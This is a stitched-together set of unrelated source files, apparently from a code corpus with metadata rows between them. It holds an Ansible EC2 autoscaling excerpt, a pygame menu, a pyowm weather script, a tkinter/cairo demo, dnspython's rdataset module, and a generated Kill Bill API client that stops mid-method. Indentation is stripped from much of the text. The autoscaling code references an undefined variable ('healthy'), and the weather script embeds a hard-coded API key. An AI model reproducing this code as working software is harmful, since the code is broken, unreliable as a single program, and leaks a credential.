instances_to_terminate = instances_to_terminate[:num_new_inst_needed]
decrement_capacity = False
break_loop = False
log.debug("{0} new instances needed".format(num_new_inst_needed))
log.debug("decrementing capacity: {0}".format(decrement_capacity))
for instance_id in instances_to_terminate:
elb_dreg(connection, module, group_name, instance_id)
log.debug("terminating instance: {0}".format(instance_id))
connection.terminate_instance(instance_id, decrement_capacity=decrement_capacity)
# we wait to make sure the machines we marked as Unhealthy are
# no longer in the list
return break_loop, desired_size, instances_to_terminate
def wait_for_term_inst(connection, module, term_instances):
batch_size = module.params.get('replace_batch_size')
wait_timeout = module.params.get('wait_timeout')
group_name = module.params.get('name')
lc_check = module.params.get('lc_check')
as_group = connection.get_all_groups(names=[group_name])[0]
props = get_properties(as_group)
count = 1
wait_timeout = time.time() + wait_timeout
while wait_timeout > time.time() and count > 0:
log.debug("waiting for instances to terminate")
count = 0
as_group = connection.get_all_groups(names=[group_name])[0]
props = get_properties(as_group)
instance_facts = props['instance_facts']
instances = ( i for i in instance_facts if i in term_instances)
for i in instances:
lifecycle = instance_facts[i]['lifecycle_state']
health = instance_facts[i]['health_status']
log.debug("Instance {0} has state of {1},{2}".format(i,lifecycle,health ))
if lifecycle == 'Terminating' or healthy == 'Unhealthy':
count += 1
time.sleep(10)
if wait_timeout <= time.time():
# waiting took too long
module.fail_json(msg = "Waited too long for old instances to terminate. %s" % time.asctime())
def wait_for_new_inst(module, connection, group_name, wait_timeout, desired_size, prop):
# make sure we have the latest stats after that last loop.
as_group = connection.get_all_groups(names=[group_name])[0]
props = get_properties(as_group)
log.debug("Waiting for {0} = {1}, currently {2}".format(prop, desired_size, props[prop]))
# now we make sure that we have enough instances in a viable state
wait_timeout = time.time() + wait_timeout
while wait_timeout > time.time() and desired_size > props[prop]:
log.debug("Waiting for {0} = {1}, currently {2}".format(prop, desired_size, props[prop]))
time.sleep(10)
as_group = connection.get_all_groups(names=[group_name])[0]
props = get_properties(as_group)
if wait_timeout <= time.time():
# waiting took too long
module.fail_json(msg = "Waited too long for new instances to become viable. %s" % time.asctime())
log.debug("Reached {0}: {1}".format(prop, desired_size))
return props
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
name=dict(required=True, type='str'),
load_balancers=dict(type='list'),
availability_zones=dict(type='list'),
launch_config_name=dict(type='str'),
min_size=dict(type='int'),
max_size=dict(type='int'),
desired_capacity=dict(type='int'),
vpc_zone_identifier=dict(type='list'),
replace_batch_size=dict(type='int', default=1),
replace_all_instances=dict(type='bool', default=False),
replace_instances=dict(type='list', default=[]),
lc_check=dict(type='bool', default=True),
wait_timeout=dict(type='int', default=300),
state=dict(default='present', choices=['present', 'absent']),
tags=dict(type='list', default=[]),
health_check_period=dict(type='int', default=300),
health_check_type=dict(default='EC2', choices=['EC2', 'ELB']),
default_cooldown=dict(type='int', default=300),
wait_for_instances=dict(type='bool', default=True),
termination_policies=dict(type='list', default='Default')
),
)
module = AnsibleModule(
argument_spec=argument_spec,
mutually_exclusive = [['replace_all_instances', 'replace_instances']]
)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
state = module.params.get('state')
replace_instances = module.params.get('replace_instances')
replace_all_instances = module.params.get('replace_all_instances')
region, ec2_url, aws_connect_params = get_aws_connection_info(module)
try:
connection = connect_to_aws(boto.ec2.autoscale, region, **aws_connect_params)
if not connection:
module.fail_json(msg="failed to connect to AWS for the given region: %s" % str(region))
except boto.exception.NoAuthHandlerFound, e:
module.fail_json(msg=str(e))
changed = create_changed = replace_changed = False
if state == 'present':
create_changed, asg_properties=create_autoscaling_group(connection, module)
elif state == 'absent':
changed = delete_autoscaling_group(connection, module)
module.exit_json( changed = changed )
if replace_all_instances or replace_instances:
replace_changed, asg_properties=replace(connection, module)
if create_changed or replace_changed:
changed = True
module.exit_json( changed = changed, **asg_properties )
if __name__ == '__main__':
main()
|
gpl-3.0
| -6,694,148,389,157,273,000
| 40.331731
| 232
| 0.645022
| false
| 3.857319
| true
| false
| false
|
sireliah/poniat
|
menu.py
|
1
|
2882
|
#-*- coding: utf-8 -*-
import sys
import pygame
from pygame.locals import *
from utils import *
from initial import LoadMenuTextures
class MainMenu(LoadMenuTextures):
def __init__(self, modes, win_w, win_h):
self.showmain = True
self.submenu = False
self.click = False
self.modes = modes
LoadMenuTextures.__init__(self, win_w, win_h)
self.menuloop()
def mousepos(self):
self.pos = pygame.mouse.get_pos()
def is_inside(self, coords):
x, y = self.pos
if (x > coords[0] and x < coords[4]) and (y > coords[1] and y < coords[5]):
return True
else:
return False
def startbutton(self):
if self.is_inside(self.start_coords):
self.start.show_button(hover=True)
if self.click:
self.showmain = False
else:
self.start.show_button()
def aboutbutton(self):
if self.is_inside(self.about_coords):
self.about.show_button(hover=True)
if self.click:
self.submenu = True
else:
self.about.show_button()
def gobackbutton(self):
if self.is_inside(self.goback_coords):
self.goback.show_button(hover=True)
if self.click:
self.submenu = False
else:
self.goback.show_button()
def exitbutton(self):
if self.is_inside(self.exit_coords):
self.exit.show_button(hover=True)
if self.click:
sys.exit()
else:
self.exit.show_button()
def events(self):
self.mousepos()
self.click = False
for event in pygame.event.get():
if event.type == QUIT:
print("koniec")
if event.type == KEYDOWN:
if event.key == K_ESCAPE:
exit()
if event.key == K_SPACE:
pass
if event.key == K_RETURN:
self.showmain = False
if event.key == K_LCTRL:
pass
elif event.type == MOUSEBUTTONDOWN:
self.click = True
def menuloop(self):
while self.showmain:
clear()
self.events()
self.mainback.show(0, 0)
if self.submenu:
self.aboutback.show(0, 0)
self.gobackbutton()
else:
self.startbutton()
self.aboutbutton()
self.exitbutton()
self.font.show(u"X: %s, Y: %s" % (self.pos), DARKRED, 10, 30, 1, 1)
pygame.display.flip()
clear()
self.mainback.show(0, 0)
self.frame.show(13, 14, 1.0, 1.0)
self.font.show(u"Ładuję...", DARKRED, 10, 30, 2, 2)
pygame.display.flip()
|
gpl-3.0
| 1,126,106,222,080,723,800
| 27.514851
| 83
| 0.498958
| false
| 3.829787
| false
| false
| false
|
FeodorM/some_code
|
some_nice_python_things/weather.py
|
1
|
2096
|
#! /usr/bin/env python3
import pyowm
import datetime
owm = pyowm.OWM('2642ecf7132b8918b8f073910006483c', language='ru')
now = pyowm.timeutils.now().date()
tomorrow = pyowm.timeutils.tomorrow().date()
def to_human_time(unix):
return datetime.datetime.fromtimestamp(unix)
def weather_date(weather):
return to_human_time(weather.get_reference_time()).date()
def temperature_to_str(weather):
rain = weather.get_rain()
if not rain:
rain = 'no rain'
return "{}: {}, {}C, {}, humidity: {}%\n".format(
to_human_time(weather.get_reference_time()).time(),
weather.get_detailed_status(),
weather.get_temperature('celsius')['temp'],
rain,
weather.get_humidity()
)
def forecast():
f = owm.three_hours_forecast('Voronezh,RU')
weathers = f.get_forecast().get_weathers()
if weather_date(weathers[0]) == now:
print('Сегодня:\n')
for w in (weather for weather in weathers if weather_date(weather) == now):
print(temperature_to_str(w))
print('Завтра:\n')
for w in (weather for weather in weathers if weather_date(weather) == tomorrow):
print(temperature_to_str(w))
def current_weather():
w = owm.weather_at_place('Voronezh,RU').get_weather()
print("""
{}
Temperature: {}C -- {}C ({}C)
Clouds: {}%
Rain: {}
Humidity: {}%
Wind speed: {}m/s
Time: {}
""".format(
w.get_detailed_status(),
w.get_temperature('celsius')['temp_min'],
w.get_temperature('celsius')['temp_max'],
w.get_temperature('celsius')['temp'],
w.get_clouds(),
w.get_rain(),
w.get_humidity(),
w.get_wind()['speed'],
w.get_reference_time('iso')
))
if __name__ == '__main__':
import sys
arg = '' if len(sys.argv) == 1 else sys.argv[1]
if arg == '':
current_weather()
forecast()
elif arg == '-n' or arg == '--now':
current_weather()
elif arg == '-f' or arg == '--forecast':
forecast()
else:
print('Wrong argument')
|
mit
| 2,245,925,329,467,947,500
| 23.797619
| 84
| 0.572732
| false
| 3.194785
| false
| false
| false
|
jeremiedecock/snippets
|
python/tkinter/python3/cairo_with_pil.py
|
1
|
3643
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) 2015 Jérémie DECOCK (http://www.jdhp.org)
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# SEE: http://stackoverflow.com/questions/25480853/cairo-with-tkinter
# http://effbot.org/tkinterbook/photoimage.htm#patterns
# Required Debian package (Debian 8.1 Jessie): python3-pil.imagetk
import tkinter as tk
import PIL.Image as pil # PIL.Image is a module not a class...
import PIL.ImageTk as piltk # PIL.ImageTk is a module not a class...
import cairo
if tk.TkVersion < 8.6:
print("*" * 80)
print("WARNING: Tk version {} is installed on your system.".format(tk.TkVersion))
print("Tk < 8.6 only supports three file formats: GIF, PGM and PPM.")
print("You need to install Tk >= 8.6 if you want to read JPEG and PNG images!")
print("*" * 80)
# CAIRO
w, h = 800, 600
cairo_surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, w, h)
cairo_context = cairo.Context(cairo_surface)
# Draw something
cairo_context.scale(w, h)
cairo_context.rectangle(0, 0, 1, 1)
cairo_context.set_source_rgba(1, 0, 0, 0.8)
cairo_context.fill()
# TKINTER
# WARNING:
# A Tk window MUST be created before you can call PhotoImage!
# See: http://stackoverflow.com/questions/3177231/python-pil-imagetk-photoimage-is-giving-me-a-bus-error
# http://stackoverflow.com/questions/1236540/how-do-i-use-pil-with-tkinter
root = tk.Tk()
# PIL
# WARNING:
# You must keep a reference to the image object in your Python program,
# either by storing it in a global variable, or by attaching it to another
# object!
#
# When a PhotoImage object is garbage-collected by Python (e.g. when you
# return from a function which stored an image in a local variable), the
# image is cleared even if it’s being displayed by a Tkinter widget.
#
# To avoid this, the program must keep an extra reference to the image
# object. A simple way to do this is to assign the image to a widget
# attribute, like this:
#
# label = Label(image=tk_photo)
# label.image = tk_photo # keep a reference!
# label.pack()
#
# (src: http://effbot.org/tkinterbook/photoimage.htm#patterns)
# See also http://infohost.nmt.edu/tcc/help/pubs/pil/image-tk.html
# WARNING:
# "cairo_surface.get_data()" is not yet implemented for Python3 (but it works with Python2).
# See http://www.cairographics.org/documentation/pycairo/3/reference/surfaces.html#cairo.ImageSurface.get_data
pil_image = pil.frombuffer("RGBA", (w,h), cairo_surface.get_data(), "raw", "BGRA", 0, 1)
tk_photo = piltk.PhotoImage(pil_image)
# TKINTER
label = tk.Label(root, image=tk_photo)
label.pack()
root.mainloop()
|
mit
| 2,852,471,698,596,769,000
| 34.676471
| 110
| 0.732344
| false
| 3.332418
| false
| false
| false
|
ostinelli/pyopenspime
|
lib/dns/rdataset.py
|
1
|
11607
|
# Copyright (C) 2001-2007 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""DNS rdatasets (an rdataset is a set of rdatas of a given type and class)"""
import random
import StringIO
import struct
import dns.exception
import dns.rdatatype
import dns.rdataclass
import dns.rdata
import dns.set
# define SimpleSet here for backwards compatibility
SimpleSet = dns.set.Set
class DifferingCovers(dns.exception.DNSException):
"""Raised if an attempt is made to add a SIG/RRSIG whose covered type
is not the same as that of the other rdatas in the rdataset."""
pass
class IncompatibleTypes(dns.exception.DNSException):
"""Raised if an attempt is made to add rdata of an incompatible type."""
pass
class Rdataset(dns.set.Set):
"""A DNS rdataset.
@ivar rdclass: The class of the rdataset
@type rdclass: int
@ivar rdtype: The type of the rdataset
@type rdtype: int
@ivar covers: The covered type. Usually this value is
dns.rdatatype.NONE, but if the rdtype is dns.rdatatype.SIG or
dns.rdatatype.RRSIG, then the covers value will be the rdata
type the SIG/RRSIG covers. The library treats the SIG and RRSIG
types as if they were a family of
types, e.g. RRSIG(A), RRSIG(NS), RRSIG(SOA). This makes RRSIGs much
easier to work with than if RRSIGs covering different rdata
types were aggregated into a single RRSIG rdataset.
@type covers: int
@ivar ttl: The DNS TTL (Time To Live) value
@type ttl: int
"""
__slots__ = ['rdclass', 'rdtype', 'covers', 'ttl']
def __init__(self, rdclass, rdtype, covers=dns.rdatatype.NONE):
"""Create a new rdataset of the specified class and type.
@see: the description of the class instance variables for the
meaning of I{rdclass} and I{rdtype}"""
super(Rdataset, self).__init__()
self.rdclass = rdclass
self.rdtype = rdtype
self.covers = covers
self.ttl = 0
def _clone(self):
obj = super(Rdataset, self)._clone()
obj.rdclass = self.rdclass
obj.rdtype = self.rdtype
obj.covers = self.covers
obj.ttl = self.ttl
return obj
def update_ttl(self, ttl):
"""Set the TTL of the rdataset to be the lesser of the set's current
TTL or the specified TTL. If the set contains no rdatas, set the TTL
to the specified TTL.
@param ttl: The TTL
@type ttl: int"""
if len(self) == 0:
self.ttl = ttl
elif ttl < self.ttl:
self.ttl = ttl
def add(self, rd, ttl=None):
"""Add the specified rdata to the rdataset.
If the optional I{ttl} parameter is supplied, then
self.update_ttl(ttl) will be called prior to adding the rdata.
@param rd: The rdata
@type rd: dns.rdata.Rdata object
@param ttl: The TTL
@type ttl: int"""
#
# If we're adding a signature, do some special handling to
# check that the signature covers the same type as the
# other rdatas in this rdataset. If this is the first rdata
# in the set, initialize the covers field.
#
if self.rdclass != rd.rdclass or self.rdtype != rd.rdtype:
raise IncompatibleTypes
if not ttl is None:
self.update_ttl(ttl)
if self.rdtype == dns.rdatatype.RRSIG or \
self.rdtype == dns.rdatatype.SIG:
covers = rd.covers()
if len(self) == 0 and self.covers == dns.rdatatype.NONE:
self.covers = covers
elif self.covers != covers:
raise DifferingCovers
if dns.rdatatype.is_singleton(rd.rdtype) and len(self) > 0:
self.clear()
super(Rdataset, self).add(rd)
def union_update(self, other):
self.update_ttl(other.ttl)
super(Rdataset, self).union_update(other)
def intersection_update(self, other):
self.update_ttl(other.ttl)
super(Rdataset, self).intersection_update(other)
def update(self, other):
"""Add all rdatas in other to self.
@param other: The rdataset from which to update
@type other: dns.rdataset.Rdataset object"""
self.update_ttl(other.ttl)
super(Rdataset, self).update(other)
def __repr__(self):
if self.covers == 0:
ctext = ''
else:
ctext = '(' + dns.rdatatype.to_text(self.covers) + ')'
return '<DNS ' + dns.rdataclass.to_text(self.rdclass) + ' ' + \
dns.rdatatype.to_text(self.rdtype) + ctext + ' rdataset>'
def __str__(self):
return self.to_text()
def __eq__(self, other):
"""Two rdatasets are equal if they have the same class, type, and
covers, and contain the same rdata.
@rtype: bool"""
if not isinstance(other, Rdataset):
return False
if self.rdclass != other.rdclass or \
self.rdtype != other.rdtype or \
self.covers != other.covers:
return False
return super(Rdataset, self).__eq__(other)
def __ne__(self, other):
return not self.__eq__(other)
def to_text(self, name=None, origin=None, relativize=True,
override_rdclass=None, **kw):
"""Convert the rdataset into DNS master file format.
@see: L{dns.name.Name.choose_relativity} for more information
on how I{origin} and I{relativize} determine the way names
are emitted.
Any additional keyword arguments are passed on to the rdata
to_text() method.
@param name: If name is not None, emit a RRs with I{name} as
the owner name.
@type name: dns.name.Name object
@param origin: The origin for relative names, or None.
@type origin: dns.name.Name object
@param relativize: True if names should names be relativized
@type relativize: bool"""
if not name is None:
name = name.choose_relativity(origin, relativize)
ntext = str(name)
pad = ' '
else:
ntext = ''
pad = ''
s = StringIO.StringIO()
if not override_rdclass is None:
rdclass = override_rdclass
else:
rdclass = self.rdclass
if len(self) == 0:
#
# Empty rdatasets are used for the question section, and in
# some dynamic updates, so we don't need to print out the TTL
# (which is meaningless anyway).
#
print >> s, '%s%s%s %s' % (ntext, pad,
dns.rdataclass.to_text(rdclass),
dns.rdatatype.to_text(self.rdtype))
else:
for rd in self:
print >> s, '%s%s%d %s %s %s' % \
(ntext, pad, self.ttl, dns.rdataclass.to_text(rdclass),
dns.rdatatype.to_text(self.rdtype),
rd.to_text(origin=origin, relativize=relativize, **kw))
#
# We strip off the final \n for the caller's convenience in printing
#
return s.getvalue()[:-1]
def to_wire(self, name, file, compress=None, origin=None,
override_rdclass=None, want_shuffle=True):
"""Convert the rdataset to wire format.
@param name: The owner name of the RRset that will be emitted
@type name: dns.name.Name object
@param file: The file to which the wire format data will be appended
@type file: file
@param compress: The compression table to use; the default is None.
@type compress: dict
@param origin: The origin to be appended to any relative names when
they are emitted. The default is None.
@returns: the number of records emitted
@rtype: int
"""
if not override_rdclass is None:
rdclass = override_rdclass
want_shuffle = False
else:
rdclass = self.rdclass
file.seek(0, 2)
if len(self) == 0:
name.to_wire(file, compress, origin)
stuff = struct.pack("!HHIH", self.rdtype, rdclass, 0, 0)
file.write(stuff)
return 1
else:
if want_shuffle:
l = list(self)
random.shuffle(l)
else:
l = self
for rd in l:
name.to_wire(file, compress, origin)
stuff = struct.pack("!HHIH", self.rdtype, rdclass,
self.ttl, 0)
file.write(stuff)
start = file.tell()
rd.to_wire(file, compress, origin)
end = file.tell()
assert end - start < 65536
file.seek(start - 2)
stuff = struct.pack("!H", end - start)
file.write(stuff)
file.seek(0, 2)
return len(self)
def match(self, rdclass, rdtype, covers):
"""Returns True if this rdataset matches the specified class, type,
and covers"""
if self.rdclass == rdclass and \
self.rdtype == rdtype and \
self.covers == covers:
return True
return False
def from_text_list(rdclass, rdtype, ttl, text_rdatas):
"""Create an rdataset with the specified class, type, and TTL, and with
the specified list of rdatas in text format.
@rtype: dns.rdataset.Rdataset object
"""
if isinstance(rdclass, str):
rdclass = dns.rdataclass.from_text(rdclass)
if isinstance(rdtype, str):
rdtype = dns.rdatatype.from_text(rdtype)
r = Rdataset(rdclass, rdtype)
r.update_ttl(ttl)
for t in text_rdatas:
rd = dns.rdata.from_text(r.rdclass, r.rdtype, t)
r.add(rd)
return r
def from_text(rdclass, rdtype, ttl, *text_rdatas):
"""Create an rdataset with the specified class, type, and TTL, and with
the specified rdatas in text format.
@rtype: dns.rdataset.Rdataset object
"""
return from_text_list(rdclass, rdtype, ttl, text_rdatas)
def from_rdata_list(ttl, rdatas):
"""Create an rdataset with the specified TTL, and with
the specified list of rdata objects.
@rtype: dns.rdataset.Rdataset object
"""
if len(rdatas) == 0:
raise ValueError, "rdata list must not be empty"
r = None
for rd in rdatas:
if r is None:
r = Rdataset(rd.rdclass, rd.rdtype)
r.update_ttl(ttl)
first_time = False
r.add(rd)
return r
def from_rdata(ttl, *rdatas):
"""Create an rdataset with the specified TTL, and with
the specified rdata objects.
@rtype: dns.rdataset.Rdataset object
"""
return from_rdata_list(ttl, rdatas)
|
gpl-3.0
| 7,146,983,658,648,308,000
| 34.279635
| 78
| 0.591023
| false
| 4.012098
| false
| false
| false
|
killbill/killbill-client-python
|
killbill/api/account_api.py
|
1
|
210059
|
# coding: utf-8
#
# Copyright 2010-2014 Ning, Inc.
# Copyright 2014-2020 Groupon, Inc
# Copyright 2020-2021 Equinix, Inc
# Copyright 2014-2021 The Billing Project, LLC
#
# The Billing Project, LLC licenses this file to you under the Apache License, version 2.0
# (the "License"); you may not use this file except in compliance with the
# License. You may obtain a copy of the License at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""
Kill Bill
Kill Bill is an open-source billing and payments platform # noqa: E501
OpenAPI spec version: 0.22.22-SNAPSHOT
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from killbill.api_client import ApiClient
class AccountApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def add_account_blocking_state(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Block an account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.add_account_blocking_state(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param BlockingState body: (required)
:param Str created_by: (required)
:param Date requested_date:
:param List[Str] plugin_property:
:param Str reason:
:param Str comment:
:return: List[BlockingState]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.add_account_blocking_state_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
else:
(data) = self.add_account_blocking_state_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
return data
def add_account_blocking_state_with_http_info(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Block an account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.add_account_blocking_state_with_http_info(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param BlockingState body: (required)
:param Str created_by: (required)
:param Date requested_date:
:param List[Str] plugin_property:
:param Str reason:
:param Str comment:
:return: List[BlockingState]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'body', 'created_by', 'requested_date', 'plugin_property', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_account_blocking_state" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `add_account_blocking_state`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `add_account_blocking_state`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `add_account_blocking_state`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `add_account_blocking_state`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
if 'requested_date' in params:
query_params.append(('requestedDate', params['requested_date'])) # noqa: E501
if 'plugin_property' in params:
query_params.append(('pluginProperty', params['plugin_property'])) # noqa: E501
collection_formats['pluginProperty'] = 'multi' # noqa: E501
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/block', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[BlockingState]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_email(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Add account email # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.add_email(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param AccountEmail body: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: List[AccountEmail]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.add_email_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
else:
(data) = self.add_email_with_http_info(account_id, body, created_by, **kwargs) # noqa: E501
return data
def add_email_with_http_info(self, account_id=None, body=None, created_by=None, **kwargs): # noqa: E501
"""Add account email # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.add_email_with_http_info(account_id, body, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param AccountEmail body: (required)
:param Str created_by: (required)
:param Str reason:
:param Str comment:
:return: List[AccountEmail]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['account_id', 'body', 'created_by', 'reason', 'comment'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_email" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'account_id' is set
if ('account_id' not in params or
params['account_id'] is None):
raise ValueError("Missing the required parameter `account_id` when calling `add_email`") # noqa: E501
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `add_email`") # noqa: E501
# verify the required parameter 'created_by' is set
if ('created_by' not in params or
params['created_by'] is None):
raise ValueError("Missing the required parameter `created_by` when calling `add_email`") # noqa: E501
if 'account_id' in params and not re.search('\\w+-\\w+-\\w+-\\w+-\\w+', params['account_id']): # noqa: E501
raise ValueError("Invalid value for parameter `account_id` when calling `add_email`, must conform to the pattern `/\\w+-\\w+-\\w+-\\w+-\\w+/`") # noqa: E501
collection_formats = {}
path_params = {}
if 'account_id' in params:
path_params['accountId'] = params['account_id'] # noqa: E501
query_params = []
header_params = {}
if 'created_by' in params:
header_params['X-Killbill-CreatedBy'] = params['created_by'] # noqa: E501
if 'reason' in params:
header_params['X-Killbill-Reason'] = params['reason'] # noqa: E501
if 'comment' in params:
header_params['X-Killbill-Comment'] = params['comment'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Killbill Api Key', 'Killbill Api Secret', 'basicAuth'] # noqa: E501
return self.api_client.call_api(
'/1.0/kb/accounts/{accountId}/emails', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='List[AccountEmail]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def close_account(self, account_id=None, created_by=None, **kwargs): # noqa: E501
"""Close account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.close_account(account_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str created_by: (required)
:param Bool cancel_all_subscriptions:
:param Bool write_off_unpaid_invoices:
:param Bool item_adjust_unpaid_invoices:
:param Bool remove_future_notifications:
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.close_account_with_http_info(account_id, created_by, **kwargs) # noqa: E501
else:
(data) = self.close_account_with_http_info(account_id, created_by, **kwargs) # noqa: E501
return data
def close_account_with_http_info(self, account_id=None, created_by=None, **kwargs): # noqa: E501
"""Close account # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.close_account_with_http_info(account_id, created_by, async=True)
>>> result = thread.get()
:param async bool
:param Str account_id: (required)
:param Str created_by: (required)
:param Bool cancel_all_subscriptions:
:param Bool write_off_unpaid_invoices:
:param Bool item_adjust_unpaid_invoices:
:param Bool remove_future_notifications:
:param Str reason:
:param Str comment:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
